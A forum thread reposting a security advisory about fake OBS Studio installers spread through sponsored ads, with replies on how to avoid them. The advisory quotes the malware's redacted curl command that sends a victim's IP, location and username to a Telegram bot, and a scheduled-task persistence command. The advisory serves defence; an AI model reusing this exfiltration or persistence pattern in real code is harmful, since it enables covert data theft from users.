Lipfert Posted January 17, 2023 Report Share Posted January 17, 2023 From Blackpoint Cyber Security (partner): Blackpoint Cyber is actively monitoring malicious Open Broadcaster Software (OBS) Studio being delivered through paid sponsored links. The use of sponsored links to distribute malware is another iteration in the continual attempts to compromise devices. The security community is discussing the most recent distribution of fake OBS software as a means of infecting victims, and we wanted to share some details that we have not seen published yet. The initial stage of the installation will use cURL to obtain country, IP, and city details from IPiNfo.io as three separate communications. Once this is acquired, the information is sent to a telegrams chat using a hard coded API account. curl.exe -s -k -d chat_id= --data-urlencode "text=[text] IP: X.X.X.X , Country: US, City: , UserName: [this is the device username], Date: Thu mm/dd/yyyy, hh:mm:ss" "https://api.telegram.org/[hardcoded_ID] /sendmessage" From there, it will systematically use the registry keys to disable core functionality, such as Windows Defender, and uninstall Malware Bytes. To ensure persistence, it will create a scheduled task: schtasks.exe /create /xml "C:\Users [username]\AppData\Roaming\obs-studio\bin\64bit\ar.xml How to Mitigate: Ensure you are accessing websites directly. Advertisements and affiliate links may lead to malicious websites. Only download software from legitimate websites and sources. If a paid software is being offered for free or at a discounted price, there is a higher chance it’s malicious. Important: Blackpoint’s SOC has seen indicators of compromise in our partners’ environments. The Blackpoint SOC will continue to actively monitor for any indicators of compromise associated with this vulnerability. We are confident that our experienced MDR analysts and technology will continue to protect your business and clients. Sincerely, Blackpoint Cyber Stuka, J5_Hotlead, Razwald and 3 others 6 Quote Link to comment Share on other sites More sharing options...
Vonrd Posted January 18, 2023 Report Share Posted January 18, 2023 2 hours ago, Lipfert said: The initial stage of the installation will use cURL to obtain country, IP, and city details from IPiNfo.io as three separate communications. Once this is acquired, the information is sent to a telegrams chat using a hard coded API account. curl.exe -s -k -d chat_id= --data-urlencode "text=[text] IP: X.X.X.X , Country: US, City: , UserName: [this is the device username], Date: Thu mm/dd/yyyy, hh:mm:ss" "https://api.telegram.org/[hardcoded_ID] /sendmessage" From there, it will systematically use the registry keys to disable core functionality, such as Windows Defender, and uninstall Malware Bytes. To ensure persistence, it will create a scheduled task: schtasks.exe /create /xml "C:\Users [username]\AppData\Roaming\obs-studio\bin\64bit\ar.xml How can we check to see if this is taking place? Snaggle 1 Quote Link to comment Share on other sites More sharing options...
Lipfert Posted January 18, 2023 Author Report Share Posted January 18, 2023 15 hours ago, Vonrd said: How can we check to see if this is taking place? Don't use: Open Broadcaster Software (OBS) Studio being delivered through paid sponsored links. Quote Link to comment Share on other sites More sharing options...
Britchot Posted January 18, 2023 Report Share Posted January 18, 2023 Get it directly from OBS Project. Thanks for the heads up. I'm going to put this in Tech Support, as it's related to PCs. Snaggle and Klaiber 2 Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.